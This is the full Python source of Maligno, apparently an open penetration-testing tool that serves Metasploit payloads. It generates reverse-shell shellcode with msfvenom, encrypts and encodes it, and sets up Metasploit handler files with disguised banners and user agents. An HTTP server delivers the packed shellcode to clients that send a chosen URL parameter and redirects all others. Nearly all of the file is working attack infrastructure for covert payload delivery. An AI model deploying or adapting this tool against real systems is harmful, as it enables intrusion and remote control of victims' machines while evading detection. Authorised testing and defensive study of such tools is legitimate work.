#!/usr/bin/python

################################################################
#                                                              #
# Maligno - A Metasploit payload server                        #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2014 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################


import base64, subprocess, os, sys, ssl, time, signal, urllib, httplib, malcfg, malout
from Crypto.Cipher import AES
from datetime import datetime
from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer


__version__ = "1.3"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


def header():
    os.system("clear")
    
    print ""
    print " ================================================================= "
    print "|  Maligno v{0}: A Metasploit payload server\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""


def check_for_updates():
    
    try:
        http_conn = httplib.HTTPConnection("www.encripto.no", 80, timeout=10)
        headers = { "User-Agent" : "Mozilla/5.0 (compatible; Maligno-Srv/)" + __version__ } 
        http_conn.request("HEAD", "/tools/maligno-" + __version__ + ".tar.gz", None, headers) 
        http_resp = http_conn.getresponse()

        if http_resp.status == 404:
            print ""
            malout.print_ok("There is a new version of Maligno!")
            malout.print_ok("Check http://www.encripto.no/tools for more information.\n")
        
        elif http_resp.status == 200:
            malout.print_ok("You are running the latest version of Maligno.\n")
        
        http_conn.close()
    
    except:
        malout.print_error("Could not check for updates...\n")

    return


def pack_data(shellcode, cipher, profile_network_config, profile_response_config):
    
    block_size = int(profile_network_config["blocksize"])
    padding_char = profile_network_config["paddingchar"]
    encoding = profile_network_config["encoding"]
    encoding_rounds = int(profile_network_config["rounds"])
    prefix = ""
    suffix = ""
    
    try: 
        prefix = profile_response_config["prefix"]
        
    except KeyError:
        prefix = ""

    try:
        suffix = profile_response_config["suffix"]
    
    except KeyError:
        suffix = ""
    
    plaintext = shellcode + ":" + str(block_size) + ":" + padding_char
    padded = plaintext + (block_size - len(plaintext) % block_size) * padding_char
    ciphertext = cipher.encrypt(padded)

    if encoding.upper() == "BASE64":
        for i in range(0, encoding_rounds):
            ciphertext = base64.b64encode(ciphertext)
    
    elif encoding.upper() == "HEX":
        for i in range(0, encoding_rounds):
            ciphertext = ciphertext.encode("hex")
    
    elif encoding.upper() == "BIN":
        ciphertext = ciphertext
    
    else:
        print ""
        malout.print_error("No valid encoding server config parameter found.")
        malout.print_info("Using Base64 by default...")
        for i in range(0, encoding_rounds):
            ciphertext = base64.b64encode(ciphertext)
    
    ciphertext = urllib.unquote(prefix.rstrip().lstrip()) + ciphertext + urllib.unquote(suffix.rstrip().lstrip())

    return ciphertext


def generate_shellcode(metasploit_config, server_config, msfpayload):

    msf_path = metasploit_config["path"]
    msf_payload = msfpayload["payload"]
    msf_lhost = msfpayload["lhost"]
    msf_lport = msfpayload["lport"]
    msf_encoder = msfpayload["encoder"]
    msf_bad_chars = msfpayload["badchars"]
    msf_iterations = msfpayload["iterations"]
    proxy_srv = server_config["addr"]
    proxy_port = server_config["proxyport"]
    
    s = ""
    if msf_payload.find("python") > -1:
        p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s -f raw" % 
                (msf_path, msf_payload, msf_lhost, msf_lport), stdout=subprocess.PIPE, shell=True)
        
        s = p.communicate()[0].split("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]")[1]
        s = s.replace("\n", "").replace("'", "").replace("(", "").replace(")", "").replace(" ", "").rstrip() 
        
    else:
        if msf_payload.find("https_proxy") > -1:
            p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread PROXYHOST=%s PROXYPORT=%s  PROXY_TYPE=SOCKS -e %s -i %s -f c -b '%s'" % 
                (msf_path, msf_payload, msf_lhost, msf_lport, proxy_srv, proxy_port, msf_encoder, msf_iterations, msf_bad_chars), stdout=subprocess.PIPE, shell=True)
        else:
            p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread -e %s -i %s -f c -b '%s'" % 
                (msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_iterations, msf_bad_chars), stdout=subprocess.PIPE, shell=True)
        
        s = p.communicate()[0].split("unsigned char buf[] = ")[1]
        s = s.replace("\n", "").replace('"', "").replace(";", "").replace("+", "").replace(" ", "").rstrip()        
    
    return s


def generate_resource_file(server_config, metasploit_config, profile_response_config, profile_client_config, msfpayload):

    resource_folder = metasploit_config["resourcefolder"]
    payload = msfpayload["payload"]
    payload_id = msfpayload["id"]
    host = msfpayload["lhost"]
    port = msfpayload["lport"]
    srv_banner = profile_response_config["banner"]
    user_agent = profile_client_config["useragent"]
    
    error_template = profile_response_config["errortemplate"]
    proxy_srv = server_config["addr"]
    proxy_port = server_config["proxyport"]
    
    malcfg.check_file_exists(error_template)
    
    ft = open(error_template, 'r')
    error_msg = ft.read().replace("\n", "").rstrip().lstrip()
    ft.close() 
    
    try:
        p = payload.replace(" ", "").split('/')
        resource_file = "%s_%s_%s_%s.rc" % (payload_id, str(p[-1]), host, port)
        
        if not os.path.exists(resource_folder):
            os.makedirs(resource_folder)
        
        resource_path = "%s/%s" % (resource_folder, resource_file)
        fw = open(resource_path, 'w')
        
        fw.write("use exploit/multi/handler\n")
        fw.write("set PAYLOAD " + payload + "\n")
        fw.write("set LHOST " + host + "\n")
        fw.write("set LPORT " + port + "\n")
        fw.write("set EXITFUNC thread\n")
        fw.write("set EnableStageEncoding true\n")
        fw.write("set SessionCommunicationTimeout 0\n")
        
        if payload.find("http") > -1:        
            fw.write("set MeterpreterServerName \"" + srv_banner + "\"\n")
            fw.write("set MeterpreterUserAgent \"" + user_agent + "\"\n")
            fw.write("set HttpUnknownRequestResponse \"" + error_msg + "\"\n")
        
        if payload.find("https_proxy") > -1:        
            fw.write("set PROXYHOST " + proxy_srv + "\n")
            fw.write("set PROXYPORT " + proxy_port + "\n")
            fw.write("set PROXY_TYPE SOCKS\n")        
            
        fw.write("set ExitOnSession false\n")
        fw.write("exploit -j -z\n")            
        fw.close()
        
    except IOError:
        malout.print_error("Could not generate metasploit resource file.")
        
    except OSError:
        malout.print_error("Could not create metasploit resource folder.")
    
    return


def store_package_in_cache(cache_folder, cache_file, default_file, package):
    try:
        
        if not os.path.exists(cache_folder):
            os.makedirs(cache_folder)
        
        cache_path = "%s/%s" % (cache_folder, cache_file)
        default_path = "%s/%s" % (cache_folder, default_file)
        fw = open(cache_path, 'w')
        fw.write(package)
        fw.close()
        
        if not os.path.isfile(default_path):
            fw = open(default_path, 'w')
            fw.write(package)
            fw.close()
        
    except IOError:
        malout.print_error("Could not store package in cache.")
        
    except OSError:
        malout.print_error("Could not create metasploit cache folder.")
    
    return


def read_package_from_cache(cache_path):
    lines = ""
    package = ""
    
    try:
        fr = open(cache_path, 'r')
        lines = fr.readlines()
        for l in lines:
            package += l
        
        fr.close()
    
    except IOError:
        malout.print_error("Could not find %s." % cache_path)
    
    return package


def start_socks_proxy(msf_path, port):
    p = subprocess.Popen("%smsfcli auxiliary/server/socks4a SRVPORT=%s VERBOSE=true E" % (msf_path, port), stdout=subprocess.PIPE, shell=True)
    
    return p


class GetHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        
        self.server_version = profile_response_config["banner"]
        self.sys_version = ""
        
        if profile_response_config["protocol"].upper() == "HTTP/1.1":
            self.protocol_version = "HTTP/1.1"
        
        print "==================================================================="
        print "\n[{0}]\n".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        malout.print_info("New request from %s..." % self.client_address[0])
        
        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope_config) or ("ANY" in scope_config):
            try:
                
                # The server should process requests with a certain URL parameter
                # It does not matter what path the client requested, as long as it contains the parameter
                query = urlparse(self.path).query
                url_params = dict(q.split("=") for q in query.split("&"))
                payload_id = int(url_params.get(profile_request_config["parameter"]))
                
                
                # Select cache file 
                cache_file = str(payload_id)
                cache_path = "%s/%s" % (metasploit_config["cachefolder"], cache_file)
                if os.path.isfile(cache_path):
                    malout.print_ok("Requested payload OK...")
                
                # Uses the first (default) generated payload if not found
                else:
                    cache_path = "%s/%s" % (metasploit_config["cachefolder"], default_file)
                    malout.print_error("Requested payload not found.")
                    malout.print_info("Using default payload instead...")
                    
                # Retrieve from cache    
                package = ""
                print ""
                malout.print_info("Reading packed shellcode from %s..." % cache_path)
                package = read_package_from_cache(cache_path) 
                
                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                self.send_header("Last-Modified", self.date_time_string(time.time()))
                
                if profile_server_header_config:
                    for header in profile_server_header_config:
                        if header:
                            if str(header["field"]).rstrip().lstrip().upper() == "TRANSFER-ENCODING" and str(header["value"]).rstrip().lstrip().upper() == "CHUNKED":
                                #Mispelling in order to avoid chunked responses
                                self.send_header(str(header["field"]).rstrip().lstrip(), "chuncked")
                            else:
                                self.send_header(str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())

                        else:
                            print ""
                            malout.print_error("There was a problem while parsing one of the server headers. Ingnoring it...\n")
                    
                if profile_response_config["protocol"].upper() == "HTTP/1.1":
                    self.send_header("Content-length", len(package))
                    
                self.end_headers()
                self.wfile.write(package)
                print ""
                malout.print_ok("Package sent!")
                
            except ValueError:                
                print ""
                malout.print_error("Request with unexpected format!")
                malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()
                
            except TypeError:                
                print ""
                malout.print_error("Request with unexpected format!")
                malout.print_info("Redirecting to last resort...\n")
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()
            
        else:
            print ""
            malout.print_error("Host not in scope!")
            malout.print_info("Redirecting to last resort...\n")
            self.send_response(301)
            self.send_header("Location", profile_response_config["lastresort"])
            self.end_headers()

        print ""
        malout.print_info("End of request\n")
        print "==================================================================="
        return


if __name__ == '__main__':
    
    header()
    
    server_config_file = "server_config.xml"
    
    metasploit_config = malcfg.get_metasploit_config(server_config_file)
    payload_config = malcfg.get_payload_config(server_config_file)
    scope_config = malcfg.get_scope_config(server_config_file)
    server_config = malcfg.get_server_config(server_config_file)

    profile_request_config = malcfg.get_profile_request_config(server_config["profile"])
    profile_response_config = malcfg.get_profile_response_config(server_config["profile"])
    profile_server_header_config = malcfg.get_profile_server_header_config(server_config["profile"])
    profile_network_config = malcfg.get_profile_network_config(server_config["profile"])
    profile_client_config = malcfg.get_profile_client_config(server_config["profile"])
    profile_client_header_config = malcfg.get_profile_client_header_config(server_config["profile"])
    
    cipher = AES.new(profile_network_config["secret"])
    
    generated = 0
    index = 0
    for msfpayload in payload_config:
        index += 1
        malout.print_info("Generating and caching shellcodes: %s of %s..." % (index, len(payload_config)))
        payload_generated = False
        while not payload_generated:
        
            try:
                malout.print_info("Generating msf resource file for %s...\n" % msfpayload["payload"])
                generate_resource_file(server_config, metasploit_config, profile_response_config, profile_client_config, msfpayload)
                
                malout.print_info("Generating %s with msfvenom...\n" % msfpayload["payload"])
                shellcode = generate_shellcode(metasploit_config, server_config, msfpayload)

                package = ""
                package = pack_data(shellcode, cipher, profile_network_config, profile_response_config)
                        
                cache_file = str(msfpayload["id"])
                default_file = "default"
                store_package_in_cache(metasploit_config["cachefolder"], cache_file, default_file, package)
                
                generated += 1
                payload_generated = True
                
            except IndexError:
                c = ""
                options = ["Y", "N", "y", "n"]
                while c not in options:
                    time.sleep(0.5)
                    
                    print ""
                    malout.print_error("There was a problem generating the payload with msfvenom.")
                    c = raw_input("    Would you like to retry? [Y/N]: ")
                    
                    if c.upper() == "N":
                        payload_generated = True
                    
                    elif c.upper() == "Y":
                        print ""
        
        header()

    
    malout.print_info("Starting Maligno...")
    
    if not generated:
        malout.print_error("No shellcode has been generated.")
        malout.print_error("Maligno cannot continue without shellcodes.\n")
        malout.print_error("Tip: Too many errors with msfvenom?")
        malout.print_error("Try to reduce the number of iterations and/or bad chars in your config file.\n")
        sys.exit()
    
   
    try:
        malout.print_info("Checking for updates...")
        check_for_updates()
        
        server = HTTPServer(('', int(server_config["port"])), GetHandler)
        
        # If ssl is enabled, try to locate the SSL cert file
        if server_config["ssl"].upper() == "TRUE":
            cert = open(server_config["sslcert"], 'r')
            cert.close()            
            server.socket = ssl.wrap_socket (server.socket, certfile=server_config["sslcert"], server_side=True)
            malout.print_info("SSL certificate file found. SSL enabled...")
            
        # Start proxy if enabled
        if server_config["proxy"].upper() == "TRUE":
            print ""
            malout.print_info("Starting Metasploit socks4a proxy...")
            proxy_process = start_socks_proxy(metasploit_config["path"], server_config["proxyport"])            
            malout.print_info("Proxy listening on port TCP %s...\n" % server_config["proxyport"])
        
        malout.print_info("Server profile \"%s\" loaded..." % server_config["profile"].split('/')[-1])
        malout.print_info("Maligno is up and running. Press CTRL+C to stop...\n")
        server.serve_forever()
    
    except ValueError:
        malout.print_error("A valid port must be provided in server config.\n")
        sys.exit()
        
    except IOError as e:
        if e.errno == 2:
            malout.print_error("Could not find SSL certificate file: %s.\n" % server_config["sslcert"])
            
        else:
            malout.print_error("Error: %s...\n" % e.strerror)
            
        sys.exit()

    except KeyboardInterrupt: 
    
        # Remove cache files when interrupted
        print ""
        malout.print_info("Removing cache files...")
        filelist = [ f for f in os.listdir(metasploit_config["cachefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["cachefolder"], f)
            os.remove(path)
        
        # Remove resource files when interrupted
        malout.print_info("Removing resource files...")
        filelist = [ f for f in os.listdir(metasploit_config["resourcefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["resourcefolder"], f)
            os.remove(path)
            
        # Stop proxy process if active
        if server_config["proxy"].upper() == "TRUE":
            malout.print_info("Stopping socks4a proxy (PID: %s)..." % proxy_process.pid)
            try:
                os.killpg(proxy_process.pid, signal.SIGTERM)
                
            except OSError:
                malout.print_info("Process already killed...")
                
        malout.print_info("Stopping Maligno...\n")
        sys.exit()